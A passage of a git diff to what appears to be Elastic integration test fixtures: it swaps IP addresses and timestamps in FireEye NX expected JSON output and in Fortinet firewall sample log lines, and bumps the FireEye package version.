1.2\\\",\\\"notbefore\\\":\\\"2020-07-01T00:00:00.000000+0000\\\",\\\"notafter\\\":\\\"2021-07-01T12:00:00.000000+0000\\\",\\\"client_ciphersuites\\\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\\\"client_tls_exts\\\":[0,11,10,13,15,13172],\\\"server_ciphersuite\\\":49195,\\\"server_tls_exts\\\":[0,65281,11,13172],\\\"pubkeylength\\\":65}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":1146,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { 
@@ -527,7 +467,7 @@ }, "event": { "type": "fileinfo", - "ingested": "2021-10-27T09:47:09.428569031Z", + "ingested": "2021-12-09T13:37:16.999933900Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:19.906154+0000\\\",\\\"flow_id\\\":1444203537876422,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"fileinfo\\\",\\\"src_ip\\\":\\\"192.168.1.222\\\",\\\"src_port\\\":47220,\\\"dest_ip\\\":\\\"192.168.100.31\\\",\\\"dest_port\\\":5601,\\\"proto\\\":\\\"TCP\\\",\\\"http\\\":{\\\"hostname\\\":\\\"192.168.100.31\\\",\\\"url\\\":\\\"\\\\/internal\\\\/search\\\\/es\\\",\\\"http_user_agent\\\":\\\"Mozilla\\\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\\\/537.36 (KHTML, like Gecko) Chrome\\\\/85.0.4183.102 Safari\\\\/537.36\\\",\\\"http_refer\\\":\\\"http:\\\\/\\\\/192.168.100.31:5601\\\\/app\\\\/kibana\\\",\\\"http_method\\\":\\\"POST\\\",\\\"protocol\\\":\\\"HTTP\\\\/1.1\\\",\\\"length\\\":0},\\\"app_proto\\\":\\\"http\\\",\\\"fileinfo\\\":{\\\"filename\\\":\\\"\\\\/internal\\\\/search\\\\/es\\\",\\\"magic\\\":\\\"ASCII text, with very long lines, with no line terminators\\\",\\\"state\\\":\\\"CLOSED\\\",\\\"md5\\\":\\\"548d03d3e11c009da833e6e59c4adfee\\\",\\\"stored\\\":false,\\\"size\\\":6394,\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":769,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" }, "user_agent": { @@ -551,24 +491,9 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "address": "8.8.8.8", "port": 53, - "ip": "8.8.8.8" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "dns": { "question": { 
@@ -590,7 +515,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:UvtLXqkWlKOvWqllTYIlbXPvU9Y=", + "community_id": "1:DrM2UXVr/51WHNjvsvUqPj+MU88=", "iana_number": 17, "transport": "udp" }, @@ -605,13 +530,13 @@ "related": { "ip": [ "192.168.1.176", - "8.8.8.8" + "67.43.156.15" ] }, "event": { "type": "dns", - "ingested": "2021-10-27T09:47:09.428574421Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:41.077232+0000\\\",\\\"flow_id\\\":206535698492848,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"dns\\\",\\\"src_ip\\\":\\\"192.168.1.176\\\",\\\"src_port\\\":60269,\\\"dest_ip\\\":\\\"8.8.8.8\\\",\\\"dest_port\\\":53,\\\"proto\\\":\\\"UDP\\\",\\\"dns\\\":{\\\"type\\\":\\\"query\\\",\\\"id\\\":28224,\\\"rrname\\\":\\\"time-ios.apple.com\\\",\\\"rrtype\\\":\\\"A\\\",\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":289,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999940200Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:41.077232+0000\\\",\\\"flow_id\\\":206535698492848,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"dns\\\",\\\"src_ip\\\":\\\"192.168.1.176\\\",\\\"src_port\\\":60269,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":53,\\\"proto\\\":\\\"UDP\\\",\\\"dns\\\":{\\\"type\\\":\\\"query\\\",\\\"id\\\":28224,\\\"rrname\\\":\\\"time-ios.apple.com\\\",\\\"rrtype\\\":\\\"A\\\",\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":289,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } } ]
diff --git a/packages/fireeye/manifest.yml b/packages/fireeye/manifest.yml
index 50ecbaa1b21..25a739ab137 100644
--- a/packages/fireeye/manifest.yml
+++ b/packages/fireeye/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: fireeye
 title: "Fireeye"
-version: 1.1.0
+version: 1.1.1
 license: basic
 description: "This Elastic integration collects Fireeye NX logs."
 type: integration
diff --git a/packages/fortinet/_dev/deploy/docker/sample_logs/fortinet-firewall.log b/packages/fortinet/_dev/deploy/docker/sample_logs/fortinet-firewall.log
index e3c4ddd0d9f..69666746641 100644
--- a/packages/fortinet/_dev/deploy/docker/sample_logs/fortinet-firewall.log
+++ b/packages/fortinet/_dev/deploy/docker/sample_logs/fortinet-firewall.log
@@ -1,32 +1,32 @@
-<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony"
-<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=8.8.8.8 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high"
-<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based 
Email"
-<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
-<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
-<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
-<189>date=2020-04-23 time=12:17:29 
devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8, 8.8.4.4" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
-<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium"
-<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access"
-<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 
srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN"
-<189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=8.8.4.4 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert"
+<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony"
+<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=67.43.156.13 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" 
crscore=30 craction=131072 crlevel="high"
+<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email"
+<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
+<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" 
appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
+<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
+<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13, 67.43.156.13" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
+<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" 
+<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access"
+<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN"
+<189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=67.43.156.13 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert"
 <189>date=2020-04-23 time=12:32:48 devname="testswitch3" devid="someotherrouteridagain" logid="0102043014" type="event" subtype="user" level="notice" vd="root" eventtime=1587231168439640874 tz="-0500" logdesc="FSSO logon authentication status" srcip=10.10.10.10 user="elasticouser" server="elasticserver" action="FSSO-logon" msg="FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10"
-<187>date=2020-04-23 
time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=8.8.4.4 locip=8.8.8.8 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE"
-<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.4.5.4 locip=9.9.9.9 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK"
+<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE"
+<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" 
remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0100040704" type="event" subtype="system" level="notice" vd="root" eventtime=1587231129938795255 tz="-0300" logdesc="System performance statistics" action="perf-stats" cpu=0 mem=10 totalsession=23 disk=0 bandwidth="23/4" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg="Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0" <189>date=2020-04-23 time=12:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0102043039" type="event" subtype="user" level="notice" vd="root" eventtime=1587231130109462858 tz="-0500" logdesc="Authentication logon" srcip=10.10.10.10 user="elastiiiuser" authserver="FSSO_elastiauth" action="auth-logon" status="logon" msg="User elastiiiuser added to auth logon" -<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.8.5.4 locip=7.6.3.4 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 
1" action="negotiate" remip=67.43.156.13 locip=67.43.156.14 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:24:13 devname="testswitch3" devid="someotherrouteridagain" logid="0100041006" type="event" subtype="system" level="notice" vd="root" eventtime=1587230655301863513 tz="-0300" logdesc="FortiSandbox AV database updated" version="1.522479" msg="FortiSandbox AV database updated" <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0107045057" type="event" subtype="endpoint" level="information" vd="root" eventtime=1587230627558979735 tz="-0500" logdesc="FortiClient connection added" action="add" status="success" license_limit="unlimited" used_for_type=3 connection_type="sslvpn" count=2 user="elastico" ip=172.16.0.2 name="somerouter" fctuid="645234fdd01F885824F764" msg="Add a FortiClient Connection." 
-<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=8.8.8.6 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" -<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=8.8.5.4 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" +<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=67.43.156.13 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" +<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=67.43.156.13 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" <189>date=2020-04-23 time=14:16:42 devname="testswitch3" devid="someotherrouteridagain" logid="0102043015" type="event" subtype="user" level="notice" vd="root" eventtime=1587230204674924332 tz="-0300" logdesc="FSSO log off authentication status" srcip=192.168.1.1 user="elasticadmin" server="FSSO_somefssoserver" action="FSSO-logoff" msg="FSSO-logoff event from 
FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1" -<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="9.9.9.9" action="connect" msg="FortiCloud 9.9.9.9 server is connected" +<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="67.43.156.13" action="connect" msg="FortiCloud 67.43.156.13 server is connected" <189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022913" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163375149856 tz="-0500" logdesc="FortiCloud server disconnected" server="4.4.4.4" action="disconnect" reason="connection reset" msg="FortiCloud 4.4.4.4 server is disconnected" -<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" -<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=8.6.4.7 dstport=6000 dstintf="wan1" dstintfrole="wan" 
sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=123.123.123.123 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 -<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2001:4860:4860::8888 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2001:4860:4860::8888 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" -<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=9.7.7.7 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=8.8.8.8 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" +<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 